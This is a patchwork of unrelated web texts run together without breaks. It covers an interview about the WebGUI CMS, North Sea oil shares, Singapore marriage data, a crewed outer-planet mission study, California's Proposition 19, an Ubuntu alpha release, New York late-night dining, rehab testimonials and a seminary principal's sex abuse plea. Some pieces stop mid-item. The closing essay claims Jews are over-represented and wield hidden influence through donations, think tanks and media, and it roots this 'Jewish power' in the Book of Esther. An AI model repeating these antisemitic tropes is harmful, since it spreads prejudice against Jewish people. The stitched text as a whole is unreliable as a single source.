" We train hard now for a few days and wait for the selection again five minutes before we leave again on Wednesday . "
Asked whether he was close to his fellow goalkeepers , James said : " I 'm not close to anyone . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
There are more open source web content management systems than you can shake a stick at , so what makes WebGUI special ?
To start with , it ’s more than a CMS ; with it you can publish everything from simple websites to the most complicated intranets .
In addition to the things you ’d expect to find in a CMS , such as article publishing , polls , and blogs , it has dozens of apps built in for things like calendars , mailing lists , and surveys .
And it has stuff you ’d never expect , such as event management , dynamic CRUD builders , and product comparison matrices .
Project leader JT Smith says , “ Most of our users are very large organizations – among them IEEE , California State University , the United States Department of State , and Brunswick Bowling .
However , thousands of smaller orgs use it , mostly as a simple web publishing system .
Some use it as a store ( it has a full e-commerce system built in ) , others use it as a social networking platform ( it has a full social networking platform built in ) , and others use it as a single - purpose app , such as an event management system for conventions ( yup , also built in ) . ”
Obviously WebGUI can do a lot of everything out of the box , but if its built - in tools do n’t do just what you want , you can add on your own .
With all those capabilities , documentation is important .
The project offers a free 150 - page users guide called the Primer .
WebGUI is written 100 % in Perl .
Smith says , “ Perl was the ideal language to use when I started the project because it ’s great at processing text , and the Web is nothing if not made of lots of text files .
I ’m glad I stuck with Perl all these years ; over the past 18 months or so it has become a very modern language .
Gone are the days of CGI and spaghetti code .
These days you have Plack and Starman for web development ( not to mention Catalyst , Dancer , and Mojolicious as app frameworks ) , modern objects in the form of Moose , a fully featured ORM via DBIC , and nice multitasking through AnyEvent and Coro .
“ We use other tools such as Apache , MySQL , and ImageMagick .
We used to also support Oracle and Postgres , but we had so few users taking advantage of those that it just was n’t worth supporting .
And as of WebGUI 8 , we ’ll no longer require mod_perl , which means users will have a choice of which web server they want to use .
Our recommended stack will be nginx with Starman . ”
Smith began work on WebGUI about a decade ago .
“ I had been building web applications for several years and got sick of building the same stuff over and over again , so I decided I should build a suite of applications that could be my baseline for all new projects .
That ’s where WebGUI was born . ”
In those days , a CMS might cost anywhere from $ 100 K to $ 10 million .
Smith felt he had two options for the software :
Either keep it closed source as a hosted - only solution , or open source it .
“ At the time I was n’t looking at WebGUI as a business ; it was just a tool to help me get stuff done .
Going open source helped get WebGUI adoption , and in the early days helped me get bug reports and feature requests to make it a better system .
“ SourceForge .net gave me tools I could have never dreamed of when I was on my own as a sole developer .
Worldwide mirrors for distribution was a huge reason for hosting here , but Source Forge also gave me a version control system , bug tracking , mailing list , and more .
When I was first starting out , there ’s no way I could have arranged for all those things .
These days SF is still very important to us , because it puts eyeballs on our software , and we still love the worldwide mirrors .
“ Initially everything except our website was on SF , but as we grew our needs changed .
We decided to adopt Subversion before SourceForge supported it , so that meant pulling our source code off .
Our users were also put off by having to register on our site and on SourceForge for publishing bug reports and feature requests , so we ended up building a bug tracker into WebGUI and pulled that off of SF as well .
But we ’re always evaluating how we can make better use of SF in our community . ”
Version 7.9.6 was released earlier this month , and right now the project is neck deep in creating WebGUI 8.0 .
“ Its primary features are massive scalability and performance gains , ” Smith says , “ as well as rewriting a lot of the underlying systems to use all of the modern Perl features that I discussed earlier .
When all is said and done , WebGUI should be so fast that it feels as responsive as a native desktop app to all users , and you should be able to support 300 % more users on the same hardware you have now .
The first betas for WebGUI 8 should go out at the end of summer , with a projected stable release in early January 2011 . ”
Meanwhile the project makes bug fix releases every week .
Major releases tend to come out at roughly six - month intervals .
Such a complex application needs help from people with a variety of skill sets .
The biggest current need , Smith says , is people with HTML , CSS , and design skills .
“ Our templating system is being brought up to modern HTML5 / CSS3 standards .
We could also use some great web designs brought into the system as defaults .
Beyond that , whether you can program , write documentation , write tests , validate bug reports , or anything else , we ’ll put you to work .
Nothing is ever done , and no matter how good something is , it can always be better .
“ The best way to get involved is to join us in the IRC channel #webgui on irc.freenode .
net .
Most community discussion goes on there .
However , for those people who are more comfortable working in forums , you can join us that way as well . ”
A new oil discovery in the North Sea has boosted the shares of three companies involved in the project .
Premier Oil , up 84 p to £ 12.66 , said a well drilled at the Catcher block - to the east of an earlier discovery - had found " excellent quality oil bearing sandstones . "
The news has prompted Premier - which owns 35 % of the licence - to raise its reserves estimate for the block from 25 - 50 million barrels to 50 - 80 m barrels .
Separately EnCore Oil and Nautical Petroleum - which each own 15 % of the licence - said the whole Catcher block could contain up to 300 m barrels , although it was too soon to say the likely recovery rate .
EnCore has added 15 p to 50.5 p while Nautical is up 29.75 p to 168.5p .
On Premier , analyst Richard Rose at Oriel Securities said :
Now all you need to do is drop a few eye drops on the the kleenex / toilet paper and press it on the pimple for a couple minutes .
If you 're a girl press it on the pimple before you put makeup on .
Also putting the kleenex / toilet paper with the eye drops on it in the freezer or fridge for a couple minutes before you apply it to you face or other areas it will help the swelling .
P.S sorry for no pictures on this step !
I forgot to take them !
The Jesus Dance
dance the millenium away
Sponsored by :
Joe dot Hern dot Com
Visit Ryland's Site
Thank you for visiting Joe dot Hern dot Com
Proud sponsor of Ryland 's Jesus Dance .
Lyrics to the Jesus song are found here : http://gunther.simplenet.com/v/data/plasticj.htm
The actual sound file is found here : http://www.honzman.com/sounds.htm
More Singaporeans are not getting married with the proportion of singles in 2009 significantly higher compared to a decade ago , official data showed on Tuesday .
Among those aged 30 - 34 , the proportion of singles in 2009 ( 41.9 percent for males and 29.8 percent for females ) was significantly higher compared to 1999 ( 33.2 percent for males and 21.7 percent for females ) , according to the official Population in Brief 2010 report .
Singlehood rates were the highest among males with below secondary educational qualifications and among females with university qualifications .
Citizens who do get married are also doing so at a later age .
Overall , the general marriage rate for citizen males decreased from 53.1 per 1,000 unmarried males in 1999 to 41.5 in 2009 , while that for citizen females decreased from 56.0 to 38.2 over the same period .
Proportionately more Singapore citizens are marrying non- citizens .
Of all marriages involving citizens , the share of those between citizens and non-citizens increased from 30.7 percent in 1999 to 40.8 percent in 2009 .
The majority of the non-citizen spouses originated from Asia .
Source : Xinhua
The mail below reached the PR team today .
I felt like sharing it with you .
Dear Gentoo Team ,
As a Linux user for the past 5 years , I 've been messing around with running Linux as a server and desktop at home , as I have always appreciated what is in my opinion a superior outlook on computing by the open source community .
Over this time , I have bounced from distro to distro , trying to find a system that did n't hold my hand , and let me do whatever I needed to do .
Only now that I 've acheived a working installation of Gentoo have I found what I 've been searching for .
Your distribution allowed me to get only what I need , without any waste .
Compiling everything from source , while counterproductive to my air conditioner , is truly the way to go ( again , just my opinion ) .
I also realized your team probably does n't get any messages that are n't asking for help on some obvious mistake , or to address a bug .
I 'd like to take this moment to express my sincere gratitude , not only for the Gentoo , but for all the people who make it possible .
I wish you well , you have my sincere gratitude and appreciation .
Sincerely , Capri Gomez
Scientists are usually a realistic bunch — our salaries depend on proposing projects that are doable with the tools we have in our hands , and our plans usually involve prudent small steps rather than aiming for risky big leaps .
But we sometimes dream too , and when we dream , we dream big , even if we dream very seriously .
In a project that was part dream and part technical design exercise , a group of scientists drew up a plan to send humans to the outer fringes of our solar system in the later half of the 21st century .
The result was a spaceship that may look similar to Discovery 1 from the movie 2001 : A Space Odyssey .
The new exercise was carried out at Johns Hopkins University ’s Applied Physics Laboratory , the starting point for many unmanned space missions — the study ’s lead author , Ralph McNutt , has been a prominent figure in robotic planetary exploration for many years .
The plans , published last month in the Johns Hopkins APL Technical Digest , would take us to Jupiter , Saturn , Uranus , Neptune , and Pluto starting around year 2050 .
The mission design involves future advanced technologies such as an onboard 100MW nuclear reactor powering magnetoplasmadynamic thrusters , which are basically electric ion propulsion engines on hyper - steroids .
Electric propulsion systems , which use electricity generated by solar panels to accelerate ionized molecules to produce thrust , have been successfully used on missions such as Deep Space 1 , Dawn and Hayabusa .
The proposed dream missions would use the electricity generated by a nuclear reactor to shoot a stream of plasma to power us to the distant planets .
The need for an extreme propulsion system arises because the astronauts would be exposed to high doses of galactic cosmic radiation , so the mission durations must be kept relatively short .
Even on the International Space Station , which orbits within the protection of Earth ’s magnetic field , astronauts are exposed to radiation at twice the limit for US airline pilots .
In a deep - space environment , the problem is even worse — to keep the radiation exposure to a level comparable to Earth ’s surface aboard these spacecraft , the scientists calculate that an aluminum shield weighing about 4240 metric tons would be required for a 10 - crew spaceboat , which would make the mission a complete no - go even with future technologies .
So , the scientists opted to reduce radiation exposure by shortening the missions , which meant beefing up the propulsion system .
Approximate scale comparisons of various existing and conceptual launch vehicles
Image credit : Johns Hopkins University
Their travel plan to Neptune , for example , was designed with a 5 - year total mission duration to limit the radiation exposure .
That would take us to Neptune in less than two years , which means going significantly faster than anything we have ever launched .
For example , the New Horizons probe currently en route to Pluto — the fastest man-made object in space — has reached the distance of 16.74 AUs from the sun as of this writing .
That took about 4.5 years , and it's only a little more than halfway to Neptune ’s orbit at 30 AU .
To design the mission , the scientists also gave considerations to the size of the living space in which the astronauts would spend 5 years of their lives .
They have compared the sizes of past large space habitats such as the Skylab , the Russian Mir , and the International Space Station to determine that approximately 200 cubic meters per person of habitable volume makes for a healthy living space .
If the habitable space is spherical , a crew of 10 would need a 7.8 meter radius , or about twice the size of Discovery 1 in 2001 : A Space Odyssey .
Not surprisingly , this dream voyage is not cheap .
Based on the costs of historic large technological endeavors , the scientists project that a mission to Neptune would cost roughly 4 trillion dollars .
To put this number in perspective , in 2009 , the GDP of the US was about 14 trillion dollars , and the US federal budget was about 3.1 trillion dollars , of which NASA received only $ 17.6 billion .
Due to the extreme financial cost associated with the plan , the authors conclude that , for the mission to materialize at all , it would have to be a large - scale international collaborative effort .
It is worth noting that the study is a technical dream exercise to show how it could be done .
But it is exciting to think that such an exploration plan is no longer a pure fantasy , and it can now be considered in enough detail that we can identify what specific technologies must still be developed .
The value of such a mission is intrinsically subjective , and the economic value for such an effort is difficult to gauge at this stage .
However , human beings have always dreamed of flying ever since we recognized the empty blue sky above us , and that imagination did not stop when we recognized the vast outer space beyond ; the drive for exploration is human nature .
The instinctive yearning to know what lies beyond the horizon has been one of the driving forces underlying human progress .
So why stop here now ?
Ralph L. McNutt et al. ( 2010 ) “ Human Missions Throughout the Outer Solar System : Requirements and Implementations ”
The California NAACP has endorsed a November ballot measure to legalize adult recreational use of marijuana , calling the measure a civil rights issue because blacks have a disproportionate number of arrests for marijuana possession compared with whites .
Accompanied by other African American leaders in California , the president of the state NAACP , Alice Huffman , said the current prohibition on marijuana has led to the criminalizing of young people and consequently has hampered the ability of many African Americans to prosper .
The organization is the most mainstream statewide entity to endorse the marijuana measure , Proposition 19 , to date .
" This is not a war on the drug lords , this is a war against young men and women of color , " Huffman said , adding later that , " Once a young person is arrested and brought under the justice system , he or she is more likely to get caught in the criminal justice system again , further wasting tax dollars . "
Huffman and other leaders - including Aubry Stone , president of the California Black Chamber of Commerce - argued that money currently spent on enforcing marijuana laws would be better spent on education .
Prop. 19 would legalize cultivation , possession and transporting marijuana for personal use for people 21 or older .
Local governments would be permitted to tax and regulate the production and sale of marijuana .
It would still be illegal under federal law .
In announcing support , African American leaders pointed to a report that shows that in the 25 largest counties in California , blacks are arrested for possession of marijuana at rates that are as much as four times as high as those for white people .
Those arrested are overwhelmingly young men .
Black people 18 to 25 years old use marijuana less frequently than whites , according to federal data in the National Survey on Drug Use and Health .
The report was written by Harry Levine , a sociology professor at Queens College at the City University of New York , who has researched similar trends in New York City .
It was released by the Drug Policy Alliance , which is backing the ballot measure .
" In a nutshell , the police are assigned heavily to patrol only in certain neighborhoods and in those neighborhoods they are looking for certain suspects who are young , who are male , " Levine said , adding that police would make more arrests for marijuana possession if they focused on areas with higher concentrations of whites .
Stephen Gutwillig , California State Director of the Drug Policy Alliance , called the NAACP endorsement a " landmark moment . "
" This is the African American community establishment saying ' enough is enough , ' " Gutwillig said .
But the support is not shared throughout that community , as many black religious leaders are in opposition .
Bishop Ron Allen , leader of the International Faith Based Coalition and a member of the coalition opposing Prop. 19 , said he was " shocked , stunned and surprised " by the endorsement and said it is not a civil rights issue .
" If anyone should know what illicit drugs will do to an underserved community , we expect our civil rights leaders to have a better understanding than anyone else , " he said .
While Ubuntu fans out there still discover and enjoy the brand - new Ubuntu 10.04 LTS ( Lucid Lynx ) operating system , somewhere deep in the Ubuntu headquarters , the Canonical developers are working on the next major update for their popular Linux distribution .
Therefore , we announce today that the first Alpha version of the upcoming Ubuntu 10.10 ( Maverick Meerkat ) operating system was released a few minutes ago .
As usual , we 've downloaded a copy of it in order to keep you up - to - date with the latest changes in the Ubuntu 10.10 development .
Editor 's note : I would like to inform you that the release schedule has been changed again to 3 Alpha releases , one Beta version , and a Release Candidate .
Because of this , the final release of Ubuntu 10.10 ( Maverick Meerkat ) will be available sooner , on Sunday , October 10th , 2010 !
What 's new in Ubuntu 10.10 Alpha 1 ?
Well , not much !
The developers said that the GNOME version was now 2.31.x ( current development version ) , but it appears that all the GNOME packages are still at version 2.30 , the one used in Ubuntu 10.04 LTS .
The Evolution e-mail client was updated to version 2.30.1.2 and it is now much faster than the one in Ubuntu 10.04 LTS .
Last but not least , the kernel packages were upgraded to version 2.6.34-5.12 , based on Linux kernel 2.6.34 .
This is how Ubuntu 10.10 Alpha 1 looks like ...
Ubuntu 10.10 Alpha 1
What 's new in Kubuntu 10.10 Alpha 1 ?
Kubuntu 10.10 Alpha 1
Xubuntu 10.10 Alpha 1
The Maverick Meerkat Release Schedule :
June 3rd , 2010 - Alpha 1 release ; July 1st , 2010 - Alpha 2 release ; August 5th , 2010 - Alpha 3 release ; September 2nd , 2010 - Beta release ; September 30th , 2010 - Release Candidate ; October 10th , 2010 - Final release of Ubuntu 10.10 .
Download Ubuntu 10.10 Alpha 1 ( Maverick Meerkat ) right now from Softpedia .
Download Ubuntu Netbook Remix 10.10 Alpha 1 ( Maverick Meerkat ) right now from Softpedia .
Download Ubuntu Server 10.10 Alpha 1 ( Maverick Meerkat ) right now from Softpedia .
Download Ubuntu Studio 10.10 Alpha 1 ( Maverick Meerkat ) right now from Softpedia .
Download Ubuntu Enterprise Cloud 10.10 Alpha 1 ( Maverick Meerkat ) right now from Softpedia .
Download Kubuntu 10.10 Alpha 1 ( Maverick Meerkat ) right now from Softpedia .
Download Kubuntu Netbook Remix 10.10 Alpha 1 ( Maverick Meerkat ) right now from Softpedia .
Download Xubuntu 10.10 Alpha 1 ( Maverick Meerkat ) right now from Softpedia .
Remember that this is an alpha release and it should NOT be installed on production machines .
It is intended to be used for testing purposes only .
Please report bugs to the Ubuntu Bug Tracker .
This week , game developers and software companies are revealing what the games we 'll be playing in our living rooms and parents ' basements next year will look like .
We asked you to take us a step further , and show us the games we 'll be playing in our living rooms 15 and 25 years down the line .
The winner is below , but first the runners up ...
Advertisement
16 Entry by Cobravision
When I first met Celest I knew we’d be best friends when , surrounded by a group of clearly self - righteous 9 - 5ers , she loudly exclaimed , “ There ’s no inherent value in being a morning person ! ” I ’m a night person .
Period .
And hearing Celest utter those sage words lifted me of a 20 - year guilt trip I ’d been carrying on my shoulders like a poorly constructed purse strap attached to a 50 pound bag of bricks … needless to say the guilt was crippling every time I admitted to setting my alarm to 11 AM .
After meeting Celest , I put the bag down and copped to my late night internal clock .
She taught me to trust that just because most of the world runs on a morning schedule , that does n’t make morning people qualitatively better ; they ’re just more common .
And as all good foodies know , those meals that are most common are rarely those that are most prized .
So my gift to you this holiday season is the ultimate late night list for New York City dining destinations serving gorgeous food past midnight , guilt free .
This list will help you in a pinch if you typically go to bed at a “ reasonable hour ” but one night find yourself out gallivanting ‘ til dawn , in need of some serious eats .
If , like me , you ’re truly nocturnal , this list will also help make certain you ’re hitting up all the best spots ‘ round town for all the choice bites come the bewitching hour .
Quite a few wine bars made it onto the list , a vestige from their late night European roots I ’m sure , as have a good deal of locations in my own neighborhood .
What can I say ?
I like my late nights downtown and walking distance from my apartment .
Guilty as charged .
These days , a girl ’s gotta save on cab fare .
Top 30 Late Night Hotspots
1. Best of the Best : dell ’anima
My current neighborhood obsession , for its open kitchen that actually stays that way ‘ til 2 AM every night .
Not to mention the perfetto pastas , the smoothest ricotta this side of the Atlantic , and Joe ’s smile !
Location : 38 8th Ave. at Jane St. ( West Village )
Kitchen open until : 2 am , 7 days a week
Standard Order : Braised Octopus & Ricotta Ravioli ( often these are not on the menu
so be sure to ask if they can be made to order ) , about $ 16
2. Best Spicy : Fatty Crab
Once upon a time they stayed open ‘ til 4 AM nightly …
Now I ’m lucky to squeeze in under the wire for my chili crab fix paired with a coconut filled with rum , but it ’s damn worth waiting for a table at this village rockstar .
Location : 643 Hudson St. btw .
Gansevoort and Horatio St. ( West Village )
Kitchen open until : Monday - Saturday , 2 am and Sunday 12 am
Standard Order : Chili Crab ( mp ) , Pickled Watermelon with Pork Belly ( $ 12 ) ,
Young Coconut and Rum ( $ 12 )
3. Best Eclectic : Blue Ribbon
My first NYC apartment was on this same Soho block .
For me , Blue Ribbon has always felt like coming home ( for fried chicken ) , after a boozy night out .
The crowd is always hopping , as does the menu — from French to Southern comfort food in one fell swoop .
For small plates , check out their wine bar on Downing St…it ’s a fave .
Location : 97 Sullivan St. bt. Spring and Prince ( Soho )
Kitchen open until : 4 am , 7 days a week
Standard Order : Fried Chicken ( $ 21 ) , Oysters ( 1/2 dozen for $ 12 ) , Cheese Fondue ( $ 14 )
4. Best Pick - up Joint : Employees Only
Everybody should be so lucky to have Employees Only as their “ local . ”
I ’m spoiled by the martinis , the menu , the 4 AM gratis chicken soup , not to mention the accommodating gentlemen behind the bar .
Location : 510 Hudson St. , btw .
Christopher ’s St. and W. 10th St. ( West Village )
Kitchen open until : 4 am , 7 days a week
Standard Order : The Ginger Smash ( $ 14 ) , The Tagliatelle ( $ 16 ) , The Staff Meal ( varies )
5. Best Gastro - Pub : Spotted Pig
If you do n’t get the gnudi at The Pig , you ’d better order the burger , and though the kitchen closes at 2 AM , the party continues upstairs , way into the wee hours …
Just smile and wink your way past what seems like a fire exit .
Cheers , this is gastro - pub fare at its finest !
Location : 314 W. 11th St. at Greenwich St. ( West Village )
Kitchen open until : 2 am , 7 days a week
Standard Order : Gnudi ( $ 15 ) , Cheeseburger ( $ 17 ) , Cask Ale ( $ 9 )
6. Best Uptown : Landmarc
An uptown option worth traveling for !
Yes , technically it ’s in a mall , but so is fellow Time Warner Center resident Per Se .
This is a great option when you find yourself out late , and inexplicably , way above 14th St .
With a plethora of reasonably priced half bottles of wine and a dessert sampler to feed a crowd , you can create your own tasting menu .
Location : 10 Columbus Circle , 3rd Fl. ( Central Park South )
Kitchen open until : 2 am , 7 days a week
Standard Order : Steak Tartare ( $ 18 ) , Caesar Salad ( $ 13 ) , Pasta of the Day ( varies )
7. Best Midnight Eggs : Inoteca
Midnight Eggs at Inoteca are served truffled , on toast , and over a bed of asparagus , from brunch through late night so your cravings are covered all day long .
W
ash it down with the perfect pairing : a bellini at breakfast or a glass of nero d’avola at dinner .
Buon Appetito !
Location : 98 Rivington St. at Ludlow St. ( LES )
Kitchen open until : 3 am , 7 days a week
Standard Order : Truffle Egg Toast ( $ 7 ) , Cheese Plate ( $ 11 - $ 21 ) , Verdura Misti ( $8 )
8. Best Kept Secret : Smith and Mills
This Tribeca trendsetter caters to the fashion & film crowds whose appetites are for tiny glasses of vino and an even tinier menu .
Ladies should definitely powder up in the bathroom – it ’s brilliant .
Location : 71 N. Moore St. ( Tribeca )
Kitchen open until : 3 am , 7 days a week
Standard Order : Charcuterie Plate ( $ 18 ) , Fennel Mac And Cheese ( $ 14 ) , Scallop Ragu ( $ 20 )
9. Best Tapas : Bar Carrera
Bar Veloce was the original , but Carrera stole my heart with its sultry Spanish / no fuss , E. Village vibe .
Now the Houston St. location is my fave — Stefan runs the place with style and charm .
On offer late : delicious and unexpected wines , sherries and an array of tempting tapas .
Hey , even Mario insists Spanish ham is better than Italian …
Location : 175 2nd Ave ( Soho )
Kitchen open until : 1:45 am , 7 nights a week
Standard Order : chorizo bocadillo ( $ 6 ) , lamb meatballs ( $ 6 ) , cabrales cheesecake ( $5 )
10 . Best Sherry : Terroir
A FREE sherry happy hour everyday from 5 - 6 and late night eats every night till 1 AM … is this New York or am I just dreaming ?
The folks at Terroir have dreamt up a quiet little village wine bar that ’s part college kid casual ( note the binder as menu ) and part liberal adult chic ( the Obama t- shirts say it all ) while paying equal homage to unusual wines and nibbles from around the world .
Location : 413 E. 12th St. at 1st Ave ( East Village )
Kitchen open until : Mon-Sat 2am
Standard Order : Sherry ( free ! ) , Cauliflower Frittata ( $ 6 ) , Sage Fried Sausage ( $ 7 )
To be continued …
Ben Anderson gets exclusive access to the English Defence League , a movement set up in 2009 to protest against what it sees as the dangerous spread of militant Islam in Britain .
Ben Anderson gets exclusive access to the English Defence League , the movement set up to protest against what it sees as the dangerous spread of militant Islam in Britain .
But with their demonstrations often descending into serious violence , he asks what is motivating more and more young men to join up .
“ Our son , feeling suicidal , checked himself into Covenant Hills Treatment Center .
My husband and I arranged this through our minister .
...
His change was dramatic .
In a short time , he found God and turned his life around .
He is now back with his family and in school full - time .
I ca n’t express my gratitude enough to the staff of Covenant Hills for the help that they gave my husband , my sons , and me .
...
Without the program and God , I feel that we could have never reconciled and have the relationship that we do now . ”
Pam ( A Mother )
“ Today , I am 22 years old , FREE of addiction , and celebrating my first year wedding anniversary with the love of my life ( who is also now FREE of addiction ) .
We have a beautiful 10 - moth - old baby boy , and I would just like to thank the people here for giving me the tools to overcome the strongholds of addiction .
And I ’d like to thank God for being present at this place . ”
Mindy Client
“ The unconditional love and dedication the staff extended to me and the others was truly more than I could have ever expected .
I feel truly blessed to have been a part of the Covenant Hills recovery program !
Thank you once again to you and your staff . ”
Debbie P Client
This archived news story is available only for your personal , non-commercial use .
Information in the story may be outdated or superseded by additional information .
Reading or replaying the story in its archived form does not constitute a republication of the story .
UTAH COUNTY -- Former LDS seminary principal Michael Pratt pleaded guilty to sex abuse of student at Lone Peak High School Tuesday morning .
The plea deal was reached just days before Pratt was scheduled to stand trial on 15 counts of sex abuse .
In exchange for the plea , 11 counts were dropped and prosecutors will ask the judge that he serve all of his sentences concurrently .
Prosecutors said the plea deal was finally reached in an effort to protect the victim , who , along with her family , was in the courtroom Tuesday to watch as Michael Pratt told the judge he was guilty to the charges .
The girl and her family said they are relieved to have Pratt finally take responsibility for what happened .
" The family is satisfied with the plea , and we 're extremely pleased she does not have to go through the ordeal of a trial , " said a spokesman for the victim 's family .
The guilty pleas end a case that has been going on for nearly a year , since Pratt was arrested back in July of 2009 .
Tuesday in court , Pratt admitted to having a sexual relationship with the then 16 - year - old girl , who was a student at the LDS seminary .
He admitted to three first - degree felonies and one second - degree felony of sex abuse .
Pratt made a very quick exit out of the courtroom as soon as he finished entering his guilty pleas .
The victim testified at a preliminary hearing that the two became acquainted at the seminary last winter .
She would often spend time in his office instead of class , and eventually the two would leave the campus during school time .
The girl said that he had promised to marry her .
During a preliminary hearing last fall , prosecutors played a video of Pratt singing a song about how he loved her .
On several occasions last May and June , the relationship was sexual .
In early July , her parents discovered what was going on and called police .
His arrest last summer left people who knew the popular LDS seminary teacher in shock .
He was immediately fired from his position and , after his arrest , told reporters that someday the truth would come out .
The girl 's family says they approve of the plea deal , especially since it will keep her from having to testify again about the relationship .
Prosecutors believe the plea deal ensures justice will be served .
" It 's hard to make a victim get on the stand and testify about these kinds of things that are personal and private and , for a teenage girl , embarrassing , " said prosecutor Julia Thomas .
" So it 's in everybody 's best interest to resolve it , short of a trial . "
They now hope she can begin to recover from the ordeal .
" It has interrupted nearly every facet of her life , from not being able to complete high school with her high school to her mistrust of adults and people in authority , especially in her religion , " said Thomas .
Pratt 's attorney told KSL his client took the deal after hearing the evidence against him .
He faces six years to life in prison .
The plea deal calls for the sentences to be served at the same time and , because he has no criminal history , Pratt 's attorney will argue for jail time instead of prison .
Ultimately the judge will decide what Pratt 's punishment will be when he is sentenced on Aug. 31 .
Until that time , he is free on bail .
E-mail : spenrod@ksl.com
×
Photos
Related Stories
A few weeks ago the Jewish Chronicle published a list of Jewish MPs in the UK parliament .
It named 24 in total , encompassing 12 Conservatives , 10 Labour , and two Liberal Democrats .
Author and peace activist Stuart Littlewood elaborated on these figures and presented the following analysis :
“ The Jewish population in the UK is 280,000 or 0.46 per cent .
There are 650 seats in the House of Commons so , as a proportion , Jewish entitlement is only three seats .
The conclusion is pretty obvious .
With 24 seats , Jews are eight times over - represented .
Which means , of course , that other groups must be under - represented , including Muslims … If Muslims , for instance , were over - represented to the same extent as the Jews ( i.e. eight times ) they ’d have 200 seats .
All hell would break loose . ”
A question must be raised here .
Why are Jews overwhelmingly over - represented in the British parliament , in British and American political pressure groups , in political fundraising and in the media ?
Haim Saban , the Israeli - American , multibillionaire media mogul offers the answer .
The New Yorker reported this week that at a conference last fall , Saban described his pro-Israeli formula , outlining “ three ways to be influential in American politics … make donations to political parties , establish think tanks , and control media outlets . ”
As I have mentioned many times before , there is no such a thing as Jewish conspiracy .
It is all done in the open .
In front of TV cameras from all over the world , listed Israeli Propaganda Author as well as British Foreign Secretary David Miliband gave the Israelis a green light to operation Cast Lead , suggesting in Sderot that “ Israel should , above all , seek to protect its own citizens . ”
Miliband , in practice , made us all complicit in a colossal war crime committed by Israel .
Staunch Zionist Lord Levy funded the Labour party when this party launched a criminal war that intended to erase the last pocket of Arabic resistance to Zionism .
He also was n’t at all shy about it .
In the media , shameless Jewish Chronicle writers David Aaronovitch and Nick Cohen enthusiastically advocated the same criminal war in the name of ‘ moral interventionism ’ .
Nick Cohen also founded the Euston Manifesto ‘ think tank ’ to support dubious Neocon ideologies on this side of the pond .
Levy , Cohen , Aaronovitch , Miliband are all in line with Saban ’s formula : influence , donations , think tanks , media .
Yet they do n’t necessarily know Saban , and may never even have heard about the Zionist media mogul .
It is n’t necessary .
The fact is , Saban did n’t invent anything himself .
His formula is deeply brewed in the Judaic religious tradition , Jewish culture and ideology .
United Against Purim
The Book of Esther is a biblical story that is the basis for the celebration of Purim , the most joyous Jewish festival .
The book tells the story of an attempted Judeocide , but it also tells a story in which Jews manage to change their fate by means of political influence .
In the story , the Jews do manage to rescue themselves and even to mete revenge , all through an infiltration into the corridors of power .
It is set in the third year of Ahasuerus , and the ruler is a king of Persia usually identified with Xerxes I .
It is the story of a palace , a conspiracy , an attempted Judeocide and a brave and beautiful Jewish queen ( Esther ) who manages to save the Jewish people at the very last minute .
In the story , King Ahasuerus is married to Vashti , whom he repudiates after she rejects his offer to ' visit ' him during a feast .
Esther was selected from the candidates to be Ahasuerus 's new wife .
As the story progresses , Ahasuerus 's Prime Minister Haman plots to have the king kill all the Jews without knowing that Esther is actually Jewish .
Esther , together with her cousin Mordechai saves the day for their people .
Esther warns Ahasuerus of Haman 's murderous anti-Jewish plot .
Haman and his sons are hanged on the fifty cubit gallows he had originally built for cousin Mordechai .
As it happens , Mordechai takes Haman 's place , becoming the Prime Minister .
Ahasuerus 's edict decreeing the murder of the Jews cannot be rescinded , so he issues another edict allowing the Jews to take up arms and kill their enemies , which they obviously do .
The moral of the Biblical story is rather clear .
If Jews want to survive , they had better make their way into the corridors of power .
They had better bond to the rulers of the world .
With Esther , Mordechai and Purim in mind , AIPAC , Levy , ADL , David Milliband , Saban and the notion of ' Jewish power ' all appear to be an embodiment of a deep Biblical , tribal and cultural ideology .
However , here is the interesting twist .
Although the story is presented as an historic tale , the historical accuracy of the Book of Esther is largely disputed by most modern Bible acholars and historians .
The lack of any clear corroboration of between any of the details of the story with what is known of Persian History from classical sources is what has led scholars to come to the conclusion that the story is mostly , or even totally fictional .
In other words , though the Jewish moral is clear , the attempted genocide is fictional .
Seemingly , the Book of Esther sets its ( Jewish ) followers into a collective Pre-Traumatic Stress Disorder .
It transforms a fictional fantasy of ‘ destruction ’ into a vivid ‘ ideology of survival ’ .
And indeed , some read the story as an allegory of quintessentially assimilated Jews who discover that they are targets of anti-Semitism , but are also in a position to save themselves and their fellow Jews .
The Book of Esther exists to form a coherent exilic tribal identity .
It is there to plant an existential stress .
It introduces the Holocaust mentality .
Furthermore , it fixes the conditions which turn the Holocaust into reality .
In hermeneutic terms , the text shapes the reality .
In practice , it is the fearful mind the sets itself into a tragic trap of self - fulfilling prophecy .
The Shoa ideology matures into a real event .
Interestingly enough , the Book of Esther ( in the Hebrew version ) is one of only two books of the Bible that do not directly mention God ( the other is Song of Songs ) .
As in the case of Zionist secular ideology and the Holocaust religion , in the Book of Esther it is the Jews who believe in themselves , in their own power , in their uniqueness , in their sophistication , in their ability to influence , in their ability to take over kingdoms , and in their ability to save themselves .
The Book of Esther is all about empowerment .
It conveys the essence and metaphysics of Jewish power , as described by Haim Saban and performed by AIPAC .
Zionism and Democracy
Zionists seem to love democracy .
The Jewish state outrageously claims to be ‘ the only democracy in the Middle East ’ .
Israel ’s supporters around the world also advocate conflicts in the name of ‘ democracy ’ .
Why do they love democracy so much ?
I guess that the answer is devastatingly simple .
Democracy is the ideal political platform for the Zionist influence merchant .
Democracy in its current state , especially within the English - Speaking world , is a political system that specializes in positioning inadequate , unqualified and dubious characters in leading positions .
Two democratically elected leaders launched the illegal war in Iraq .
Two democratically elected leaders marched the west into a financial disaster .
Running a state is not an easy task .
It surely takes some talent and training .
In the past , our elected political leaders were experienced politicians who had achieved something in their lives , whether in academia , industry , military or the financial world .
In the past , our candidates for premiership had a curriculum vitae to share with us .
Apparently this is not the case anymore .
Time after time we are left with a ‘ democratic choice ’ to give our vote to one or another laughable young failure .
Time after time we see rising political ‘ stars ’ , people have really achieved nothing in their lives , and who are unqualified to run even a corner shop , let alone a state .
You may want to ask yourself what qualification Blair or Bush possessed before they took the wheel in their hands .
What experience does David Cameron have at his disposal in order to rescue Britain from total disaster on every possible front ( financial , Iraq , Afghanistan , education , NHS and so on ) ?
What kind of experience does David Miliband bring with him in the bid for the Labour premiership ?
The answer is none .
Our lives , our future and the future of our children are in the hands of ludicrous , clueless characters .
This may explain why Britain ended up with a hung Parliament .
